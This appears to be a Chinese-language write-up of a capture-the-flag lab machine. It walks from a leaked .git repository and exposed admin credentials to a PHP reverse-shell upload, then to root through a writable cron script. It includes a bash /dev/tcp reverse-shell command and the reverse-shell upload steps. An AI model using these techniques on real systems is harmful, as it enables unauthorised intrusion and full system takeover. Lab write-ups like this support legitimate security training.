端口扫描

靶机ip地址为192.168.7.46

目录扫描

访问80端口

拼接访问 /admin.php

发现登录框

测试sql注入，弱口令等，无结果

扫描目录发现了.git文件，存在源码泄漏

将其下载到kali上读取

python2 GitHack.py -u http://192.168.7.180/.git/

发现账号密码

admin:st@mpch0rdt.ightiRu$glo0mappL3

登录成功

存在文件上传功能，kali生成反弹shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

将ip改为kali的ip 设置端口

上传文件

开启监听

访问 /upload/php-reverse-shell.php

成功反弹shell

获得交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看系统配置文件

在 /home/eric 下发现文件

查看内容

/etc/crontab 存在计划任务

可以写入反弹shell语句

echo 'bash -i >& /dev/tcp/192.168.7.100/9999 0>&1' >> backup.sh

kali监听

反弹成功

提权成功

在 /root 下发现flag文件